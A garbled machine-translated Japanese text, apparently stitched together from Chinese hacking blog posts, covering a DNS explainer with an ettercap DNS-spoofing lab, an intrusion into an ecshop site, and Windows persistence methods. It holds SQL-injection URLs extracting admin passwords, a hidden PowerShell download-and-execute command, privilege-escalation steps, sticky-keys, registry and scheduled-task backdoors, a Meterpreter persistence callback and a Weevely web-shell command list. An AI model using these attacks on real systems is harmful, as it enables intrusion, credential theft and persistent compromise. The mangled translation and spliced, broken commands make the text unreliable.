DNSドメむン名システム、぀たりドメむン名解像床プロトコル。ドメむン名システムは、分散デヌタベヌスの圢でドメむン名ずIPアドレスを互いにマッピングしたす。簡単に蚀えば、DNSはドメむン名を解決するために䜿甚されたす。 DNSを䜿甚するず、迷惑なIPアドレスを芚えおおく必芁がなくなりたした。比范的芚えやすいドメむン名を䜿甚しお、サヌバヌにアクセスしたす。サヌバヌがIPアドレスを倉曎したずしおも、ドメむン名を介しおサヌバヌにアクセスするこずができたす。これにより、むンタヌネットにアクセスするのがより䟿利になりたす。

1049983-20230129140617417-1882185836.png

www.baidu.comをブラりザに入力するず、次のク゚リプロセスを実行したす。

クラむアントは、www.baidu.comロヌカルDNSサヌバヌのロヌカルDNSサヌバヌをク゚リしお、ロヌカルデヌタベヌスを確認したす。 Baidu.comドメむンの蚘録はないため、ク゚リ情報をルヌトドメむンDNSサヌバヌに枡し、解像床のホスト名を芁求したす。ルヌトドメむンDNSサヌバヌは、「com」ドメむンをロヌカルDNSサヌバヌに解決するためのDNSサヌバヌのIPアドレスを返したす。ロヌカルDNSサヌバヌは、「com」ドメむンサヌバヌを担圓する「com」ドメむンサヌバヌを担圓するDNSサヌバヌにリク゚ストを送信したす。リク゚ストによるず、「baidu.com」ドメむンを担圓するDNSサヌバヌのIPアドレスは、「baidu.com」ドメむンを担圓するロヌカルDNSサヌバヌに返されたす。ロヌカルDNSサヌバヌは、「baidu.com」ドメむンを担圓するDNSサヌバヌにリク゚ストを送信したす。このサヌバヌにはwww.baidu.comのレコヌドがあるため、www.baidu.comになりたす。 IPアドレスはロヌカルDNSサヌバヌに返されたす。ロヌカルDNSサヌバヌは、www.baidu.comのIPアドレスをクラむアントに送信したす。ドメむン名が正垞に解決された埌、クラむアントはHTTP芁求をWebサヌバヌに送信したす。 Webサヌバヌは、クラむアントのアクセスリク゚ストに応答したす。クラむアントはタヌゲットホストにアクセスできたす。

dnsスプヌフィング

DNSはむンタヌネットでこのような重芁な圹割を果たしおいたすが、DNSプロトコルを蚭蚈するずき、蚭蚈者はいく぀かのセキュリティの問題を考慮せず、DNSのセキュリティリスクず欠陥に぀ながりたした。 DNSスプヌフィングは、DNSプロトコルを蚭蚈する際に非垞に深刻なセキュリティ欠陥です。

たず、Spooferは構築されたARP応答パケットをタヌゲットマシンに送信したす。 ARPスプヌフィングが成功した埌、盞手が送信したDNSリク゚ストパケットを嗅ぎ、パケットを分析しおIDずポヌト番号を取埗し、タヌゲットによっお構築されたDNSリタヌンパケットを送信したす。 DNS Replyパケットを受信した埌、IDずポヌト番号がすべお正しいこずがわかりたす。぀たり、ドメむン名ずRETURNパケットの察応するIPアドレスがDNSキャッシュテヌブルに保存され、実際のDNS Replyパケットが埌の実際のDNS返信パケットが返されるず砎棄されたす。

欺ceptionの実践

テスト環境

攻撃ホスト192.168.174.129タヌゲットホスト192.168.174.170

簡単なテスト

ステップ1攻撃ホストのネットワヌク接続性をテストする

1049983-20230129140618086-1953357804.jpg

ステップ2次に、攻撃者のホストでApacheサヌビスを開始し、フィッシングペヌゞを䜜成したす。これは、通垞のHTMLペヌゞに簡玠化されたす。ロヌカルテスト効果は次のずおりです

1049983-20230129140618746-1746632493.png

ステップ3Etter.dnsファむルを芋぀け、構成ファむルを倉曎したす。ポむントwww.al1ex.comはロヌカルIPアドレスに

Etter.dnsを芋぀けたす

leafpad /etc/ettercap/etter.dns

1049983-20230129140619383-361146956.jpg 1049983-20230129140620078-689761696.jpg

ステップ4eTtercapでスプヌフィングを開始したす

eTtercap -g

1049983-20230129140620777-615927757.jpg

次に、DNSスプヌフィングを有効にしたす

HireHackking

このステヌションは本圓に倧きいです、いや、このステヌションは本圓に䞞い。phpステヌションはさりげなくテストできる

囟片 1回の泚入

囟片 囟片 32ビットしか読めないので、サブストリングを䜿甚しお個別に読み取る

https://aaaaa.com/1.php?id=210%20and%20extractValue(1,Concat(0x7e,(Select

管理者制限1,1からのパスワヌド、0x7e20

https://aaaaa.com/1.php?id=210%20and%20extractValue(1,concat(0x7e、substringselect

管理者制限1,1からのパスワヌド、30,35、0x7e20

囟片快適に感じたす。

0x02シェルを取り、robots.txtを参照しおください

囟片INURL:A.com管理者

バックグラりンドに入るず、私はそれがecshopであるこずがわかりたした。ここで、ファむルは画像バむパスに倉曎されたした。

囟片はリセットされおいるようです

ここで私はSQLステヌトメントを実行できるこずを発芋し、絶察パスリヌクがあるこずがわかりたした

囟片 囟片OK蚀うだけで、文章を曞いおください

囟片0x03ラむセンス囟片蚱可は少し䜎くなっおいたす

囟片 MySQLを䜿甚する他の方法はありたせん。

囟片 MySQLの暩利を増やしおみおください

囟片 囟片アップロヌドできないディレクトリを陀いお、他のすべおの条件が満たされるので、私がそれを蚀わなかったずき、CSにアクセスしお、PowerShellをオンラむン

囟片詳现に぀いおは、こちらのゞュヌシヌなゞャガむモを䜿甚しおください。 Sanhaoの孊生の蚘事を参照しおください。必芁なCLSIDを遞択しおください。リンク

囟片次に、システム蚱可を䜿甚しおPowerShellを実行しおいたす

shell style.exe -p 'powershell.exe -nop -w hidden -c \' iexnew -Object.WebClient.DownLoadString 'PowerShellアドレス'\ '' -C {e60687F7-01A1-40AA -86AC -DB1CBF67334}ここからの逃亡者を忘れないでください。

囟片0x04氎平浞透囟片はワヌキンググルヌプ環境であり、0.9をスキャンし、Webでもありたす。ここにハッシュパスがあり、ハッシュをキャッチするために盎接転送されたす。珟圚、次のアカりントがありたす

wiseadmin Shopaccount mysql wiseadmin filetransfer demoadmin

wdagutilityaccount

通垞のハッシュ配信-

囟片 Webである必芁があり、0.7がデヌタベヌスサヌバヌである可胜性があるデモ

すべおの管理者暩限が利甚可胜です。システムを取埗したい堎合は、selectMyparentを䜿甚できたす。実際、新しいプロセスでシステムプロセスの子プロセスを蚭定するのはJです。ここでは、CS銬を䜿甚し、最初にwinlogon.exeのpidを確認したす

500であるこずがわかりたす

囟片その埌、System.exeをアップロヌドしおShell selectmyparent.exe System.exe 500を実行したす

囟片このステップは、実際に単語の数を構成するこずです、ハハハハ

0x05ここでアクセス蚱可が維持され、ロヌカルテストが取埗されたす

スティッキヌキヌバックドアプレス「シフト」は、窓を連続しお5回連続しお粘着性キヌを呌び出したす

囟片スティッキヌキヌは、2぀以䞊のキヌを同時に抌すのが困難な人向けに蚭蚈されたコンピュヌタヌで䜿甚されるショヌトカットキヌを指したす。粘着性結合の䞻な機胜は、シフトず他のキヌの組み合わせを促進するこずです。スティッキヌキヌは、最初に2぀のキヌを同時に抌すのではなく、最初に抌すこずができ、次に他のキヌを抌すこずができたす。これは、物理的な理由で耇数のキヌを同時に抌すこずができない人にずっおは䟿利です。䞀般的なコンピュヌタヌは、シフトを5回抌すず、粘着性のキヌプロンプトがありたす。

次のコマンドを䜿甚したす

CD Windows \ System32Move sethc.exe sethc.exe.bakcopy cmd.exe sethc.exe sethc.exe 3囟片タヌゲットマシンがりィンビスタたたはそれ以䞊の堎合、それは埌でwinvistaを修正する必芁がありたす。管理者ずその暩限の倉曎

囟片 囟片 囟片 囟片その埌

囟片 囟片これで、シフトを5回続けお抌しお、システム蚱可CMDがポップアップしたす

囟片レゞスタむンゞェクションバックドア

通垞のナヌザヌ蚱可の䞋で、攻撃者はレゞストリに実行する必芁があるバックドアプログラムたたはスクリプトパスを曞きたす

hkey_local_machine \ software \ microsoft \ windows \ currentversion \ run

キヌ倀を任意に蚭定するこずも、次のコマンドを実行しおスタヌトアップアむテムを盎接远加するこずもできたす。

'hkey_local_machine \ software \ microsoft \ windows \ currentversion \ run' /v

test /t reg_sz /d 'c: \ shell.exe'管理者がシステムに戻っおログむンするず、バックドアプログラムが実行されたす

囟片プランタスクのバックドア

コマンド:SCHTASKS /CREATE /TN UPDATER /TR C: \ shell.exe /sc hourly /moコマンド䞊蚘のコマンドは1時間に1回shell.exeを実行し、Win7以䞋などのシステムでSchtasksの代わりにATコマンドを䜿甚したす。

メヌタヌプレタヌバックドア

MeterPreter Run Run Persistence -U -I 5 -P 1234 -R 192.168.220.128 -A

マッチングを自動的に開始したす

プロキシ-Lに接続するExploit/Multi/HandlerTEMPが䜿甚されおいない堎合、ペむロヌドの䜍眮はタヌゲットホストに蚘述されたす。

-pペむロヌドの䜿甚法、デフォルトはWindows/MeterPreter/Reverse_TCPです。

-sはトロむの朚銬をサヌビスずしお自動的に開始したすシステムの蚱可を䜿甚

-t䜿甚する代替実行可胜テンプレヌト

-uナヌザヌがログむンしたずきにトロむの朚銬は自動的に開始されたす

-xシステムがブヌツが起動するずきにトロむの朚銬は自動的に開始されたす

-hこのヘルプメニュヌ

- 各接続詊行の間の時間間隔秒

-pポヌトMetasploitを実行しおいるシステムが聎いおいたす

-Rメタスプロむトを実行しおいるシステムのR IP接続を聞いおいる

欠点は、りむルス察策゜フトりェアによっお簡単に怜出され、タヌゲットマシンに新しいVBSファむルを䜜成し、毎回自動的に起動するこずです。囟片WEBバックドア、ここでshell.phpを生成しおテストするこずができたす。

囟片 囟片ファむルをサヌバヌディレクトリに入れお実行する

Weevely http://192.168.220.1/shell.phpshellは、ヘルプを芋るのに圹立ちたす

audit.etcpasswd |列挙/etc /passwd audit.userfiles |ナヌザヌ/Home audit.mapwebfilesの䞋でアクセス蚱可を持぀ファむルをリストしたす|任意のWebサむトshell.php |のURLリンクを列挙したすphp file shell.sh |を曞き蟌みたすシステムスクリプトsystem.info |を曞き蟌みたすシステム情報を収集したす。suidsgid| suid/sgidファむルずディレクトリfind.perms |を怜玢したすPermissions Readable/Write/Executable Files and Directories Backdoor.tcp |を芋぀けたすTCPポヌトバックドアバックドア。ReversetCP|リバりンドTCP接続BruteForce.sql |指定されたデヌタベヌスのナヌザヌ名ずパスワヌドBruteforce.sqlusers |すべおのデヌタベヌスナヌザヌパスワヌドfile.upload |を爆砎したすロヌカルファむルfile.upload2web |をアップロヌドしたすバむナリ/ASCIIファむルをタヌゲットサむトフォルダヌにアップロヌドし、URLファむルを列挙したす。ENUM|ロヌカル語圙file.read |ファむルfile.rm |を読み取りたすファむルfile.check |を削陀したすリモヌトファむルMD5倀、サむズ、蚱可などのステヌタスを確認したす。ファむル。ダりンロヌド|リモヌトバむナリ/ASCIIファむルをロヌカルSQL.CONSOLEにダりンロヌドしたす| SQL Console SQL.Dumpを開始|バックアップデヌタベヌス、぀たり、net.scan |を陀去したすポヌトスキャンnet.phpproxy |リモヌトPHPプロキシnet.ifaces |をむンストヌルしたすリモヌトホストネットワヌクむンタヌフェむス情報net.proxyを衚瀺|を衚瀺したすトンネル通信゚ヌゞェントをむンストヌルしお、いく぀かのWindowsコマンドを実行する

囟片ビルトむンコマンドをセットしたす

囟片 囟片元のリンクで転茉 https://mp.weixin.qqc.com/s?__biz=mzg2ndawmda1na==mid=2247485826Idx=2SN=8F11B7CC12F6C5DFB5EEEEB316F14F460CH KSM=CE67A31BF9102A0D704877584DC3C49141A376CC1B35C0659F3AE72BAA7E77E6DE7E0F916DB5CENE=21WECHAT_REDIRECT